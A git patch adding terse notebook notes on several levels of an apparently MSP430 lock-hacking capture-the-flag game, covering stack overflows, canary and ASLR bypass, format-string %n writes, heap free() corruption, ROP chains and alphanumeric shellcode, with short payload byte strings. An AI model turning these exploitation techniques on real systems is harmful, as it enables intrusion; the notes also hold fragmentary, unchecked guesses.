From 95e7776c8a80ac5677ed26872c2d3ab7d7671f1b Mon Sep 17 00:00:00 2001 From: Val Date: Wed, 15 Mar 2023 20:13:34 -0500 Subject: [PATCH] notes.md: Add book notes for Montevideo through Lagos --- 10-Santa Cruz/notes.md | 26 ++++++++ 11-Jakarta/notes.md | 30 ++++++++++ 12-Addis Ababa/notes.md | 24 ++++++++ 13-Novosibirsk/notes.md | 14 +++++ 14-Algiers/notes.md | 31 ++++++++++ 15-Vladivostok/notes.md | 61 +++++++++++++++++++ 16-Bangalore/notes.md | 23 +++++++ 17-Lagos/notes.md | 129 ++++++++++++++++++++++++++++++++++++++++ 8-Montevideo/notes.md | 14 +++++ 9-Johannesberg/notes.md | 16 +++++ 10 files changed, 368 insertions(+) create mode 100644 10-Santa Cruz/notes.md create mode 100644 11-Jakarta/notes.md create mode 100644 12-Addis Ababa/notes.md create mode 100644 13-Novosibirsk/notes.md create mode 100644 14-Algiers/notes.md create mode 100644 15-Vladivostok/notes.md create mode 100644 16-Bangalore/notes.md create mode 100644 17-Lagos/notes.md create mode 100644 8-Montevideo/notes.md create mode 100644 9-Johannesberg/notes.md diff --git a/10-Santa Cruz/notes.md b/10-Santa Cruz/notes.md new file mode 100644 index 0000000..5fedf9d --- /dev/null +++ b/10-Santa Cruz/notes.md @@ -0,0 +1,26 @@ +`Taken verbatim from my notebook` +# Page 1 +``` +Santa Cruz + 2 buffers + username [0x63] -> 2404 -> 43a2 + password [0x63] -> 2404 -> 43b5 + r4: return addr: 43cc + Min len stored at 43b3 + username +0x11 index 17 + Max len stored at 43b4 + username +0x12 index 18 + 43c6 must be 00 + -> password must be 16 chars + so strcpy places 00 there + -> password: "passwordpassword" + + username[0x11] = 01 + username[0x12] = 7f + username[0x42+]= 4a44 + + Don't put important constants on the stack? + Strcpy does copy the last null byte + + A program +``` diff --git a/11-Jakarta/notes.md b/11-Jakarta/notes.md new file mode 100644 index 0000000..9ac4421 --- /dev/null +++ b/11-Jakarta/notes.md @@ -0,0 +1,30 @@ +`Taken verbatim from my notebook` +# Page 1 +``` +Jakarta + Acquires 0xff username bytes + -> 3ff2 + Acquires 0x1f - uname_len password bytes + (1f - uname_len) & 0x1ff + uname_len = 0x20? 0x21? + => passwd_len = 0x1ff + -> concatenated to username? + Return value at 401c + = [username][password][...] + + before strcpy: + username -> 2402 + password -> 2402 + concat happens in stack buffer + Length check happens Byte + 0120 ~= 0x20 <= 0x21 + u_len = (20 or 21) + p_len = (e0 -> 100) + + Password + AA [r11] [ret] [fakeret] [args] [AA...AA] + + Lesson: Sometimes things are not the data type you think they are +``` + +`// TODO: What does this mean??` diff --git a/12-Addis Ababa/notes.md b/12-Addis Ababa/notes.md new file mode 100644 index 0000000..e5942de --- /dev/null +++ b/12-Addis Ababa/notes.md @@ -0,0 +1,24 @@ +`Taken verbatim from my notebook` +# Page 1 +``` +Addis Ababa + format string vulns? (manual hint) + %n: store # chars printed into stack vaf + ? where ? + -> 2 prev characters?? + 30e0: flag location + lE: e0 30 + +30e0: \0\0 n a m e : p a s s\0 + argv [ 1 ][ 2 ][ 3 ][ 4 ][ 5 ][ 6 ] + + addr A %n + e0 30 %n %n + DEL 0 %n %n + +``` + +Editor's note: +``` + e030 256e 256e +``` diff --git a/13-Novosibirsk/notes.md b/13-Novosibirsk/notes.md new file mode 100644 index 0000000..f49b8f7 --- /dev/null +++ b/13-Novosibirsk/notes.md @@ -0,0 +1,14 @@ +`Taken verbatim from my notebook` +# Page 1 +``` +Novosibirsk + Gets 1f4 characters + Actually allocates proper buffer + + 44c8: interrupt # + would be nice to set this to 7f + + Hypothesis: + "[addr]['A';0x7d]%n" + c844 4141... 25be + Hole in one! diff --git a/14-Algiers/notes.md b/14-Algiers/notes.md new file mode 100644 index 0000000..db94214 --- /dev/null +++ b/14-Algiers/notes.md @@ -0,0 +1,31 @@ +`Taken verbatim from my notebook` +# Page 1 +``` +Algiers d.01 + "LockIT Pro Account Manager" + Tentative TODO: + Authorizer? How to auth user + Interfaces with HSM1 + + I can overflow heap objects + uname&pass 0x30 long + >0x10 overflows + Can I craft a fake heap object? + username -> overwrite pass blk header? + password -> ??? + + Hypothesis: arb write in free() + Username + passwordpassword[addr] + "d E "? + 4398: + 0000 4044 0000 .... Unguarded + in free: free() is arb + r15 = &this_block write~! + r14 = &prev_block + r13 = {size:15,final:1} + r12 = {prev_size:5,final:1} + if prev is final: + skip last-block steps + else last-block steps +``` diff --git a/15-Vladivostok/notes.md b/15-Vladivostok/notes.md new file mode 100644 index 0000000..5c23e97 --- /dev/null +++ b/15-Vladivostok/notes.md @@ -0,0 +1,61 @@ +`Taken verbatim from my notebook` +# Page 1 +``` +Vladivostok ASLR bypass? + username[8]: 0x242b + password[ ] + aslr_base = r11 + + aslr_address = normal - 0x4000 + aslr_base + + Have to call 0x10 directly? + INT 7f: + Takes no arguments (THE LESSON WAS) + 7f passed in SR (ROP CHAINING) + All calls to INT wrapped in (+ASLR BYPASS) + push/pop SR? + Neat? + + 41414141[r10][r11][ret] + FUCKING PRINTF? + + Things I have: + printf(username, ...) + buffer overflow on stack + + Things I need + Address on stack? + + Flow: 1. enter "username" + 2. "username" printed + <- Create payload + 3. enter "password" + 4. buffer overflow +``` + +# Page 2 +``` +The Hack (Vladivostok) + + Uname payload: "%x%x%x%x" + output %printf + Pword payload: "AAAA(r10)(r11)(pc)[args...]" + + Useful locations: + +2aa: pop sr + +2ac: add 8, sp + +2ae: __check_password + + +56c: mov.b @sp, r15; + sxt r15 ; pop.b r15 + incd sp ; + ret ; + + +4f4: swpb r15 ; + mov r15, sr ; + bis #8000, sr ; INT + call 0x10 ; + ... ; + ret ; + + [popb]7f7f[INT] diff --git a/16-Bangalore/notes.md b/16-Bangalore/notes.md new file mode 100644 index 0000000..72bce76 --- /dev/null +++ b/16-Bangalore/notes.md @@ -0,0 +1,23 @@ +`Taken verbatim from my notebook` +# Page 1 +``` +Bangalore DEP/NX + Passwords 8-16 chars } 0x20 B limit + Takes 0x30 (48) chars } + + Strategy: Construct a ROP chain + to turn page 45 executable + NO STRCPY + + mark_page_executable @ 44ba + 44ba: sub #6, sp + mov #9100, sr + call #0x10 + add #0xa, sp + RET + + 4458: call 0x10 + + ROP to set stack executable, + Exec to open the lock +``` diff --git a/17-Lagos/notes.md b/17-Lagos/notes.md new file mode 100644 index 0000000..71ef9fd --- /dev/null +++ b/17-Lagos/notes.md @@ -0,0 +1,129 @@ +`Taken from my notebook, verbatim` + + +### Page 5 +``` +LAGOS + 45a0: 0b41 -> 3041 "ret" + + WE CAN add #4130, sp + ~ MOVE THE STACK ~ + + 0: input [0x1bf]= + 1: ret -> 4444 (sp+0x60) + 2: Move stack to 2400+1c0 + 3: Ret -> arbitrary address (i.e. 2400+1c2) + 4: Execute arbitrary code +``` + +### Page 1 +``` +Lagos Alphanumerics Only + `0x200 B -> #2400` + Password valid range: 8-16 c + Valid chars: + [0-9] [A-Z] [a-z] + 30-39 41-5a 61-7a + + We have enough chars + to overwrite current + function + + 1b5 bytes before hitting + current instruction + + 3041 = ret + 45a0 = 0b41 + at index 1b5 + Control of return addr + -> we can ret to string buffer + bypassing sanitizer! + + ret to 2400+1bb + 25b5 + run code from there! + ret at index 0x11 + ... we need a JMP to get there. + ... all our jumps are positive +``` + +### Page 2 +``` + D p + 4470 looks like a good place + D 0 + for code, or 4430 + + 5a37: jge $-14a ? + + Arithmetic instructions + Form addresses with sub? + 25 b6 bb25 + ^lsb + 55-30 7a-30(ish) + 547a + 3030 = + 5630 - 307a = 25bb! + V 0 0 z + + We can load from our string: + pop r4 = 3441 + "4 A " + -> can be any reg from + 0-9: 3r41 + add.b = 7x5y + 3451 = pop & add to r4 + + 3441 3451 + pop r4 add r4 +``` + +### Page 3 +``` + Instructions in range + 30: jn + 34: jge + 38: jl + 3c: jmp + + 4#: mov + 5#: add + 6#: addc + 7#: subc + + Feasible addressing modes + 10 @Rn Register indirect + 11 @Rn+ RI w/ post-inc + + Subtract the stack from pc? + 3071 subc @sp+, pc + "Large relative jump" + + Alignment in 2400 buffer + is not same as in PC +``` + +### Page 4 +``` +What is an alphanumeric character? + [0-9] [A-Z] [a-z] + 30-39 41-5a 61-7a + +Buffers: 43ed: stack buffer + 2400: load buffer + + 43ed + 0x57: 4444 + + 45a0: last byte copied (1b3 bytes) + &[43ed + 1b3] = 0x30, '0' + 43ed + 1c0 = payload + + Correction: sp at 43ec before + we gain exec + ret will tak sp to 43ee + ... we need to create a fake stack + somewhere over in the controllable + zone + + The loop only continues if the + FOLLOWING BYTE is valid. +``` diff --git a/8-Montevideo/notes.md b/8-Montevideo/notes.md new file mode 100644 index 0000000..b8aff3a --- /dev/null +++ b/8-Montevideo/notes.md @@ -0,0 +1,14 @@ +`Taken verbatim from my notebook` +# Page 1 +``` +Montevideo + strcpy/memset + + Allocated 16-byte buffer on stack + Strcpy into it + 43ee: start of stack buffer + 43fe: return address + 454c: INT + + ['A';16] 4c45 0000 7f +``` diff --git a/9-Johannesberg/notes.md b/9-Johannesberg/notes.md new file mode 100644 index 0000000..83ba9ce --- /dev/null +++ b/9-Johannesberg/notes.md @@ -0,0 +1,16 @@ +`Taken verbatim from my notebook` +# Page 1 +``` +Johannesberg STACK CANARY + Gets 3f bytes + strcpy over stack + ... + cmp str[0x11] == c6 + if str[0x11] == c6 ; 17th byte is c6 + add #0x12, sp + ret + else + halt + + ['A';16] cb cb 94 45 20 20 7f +```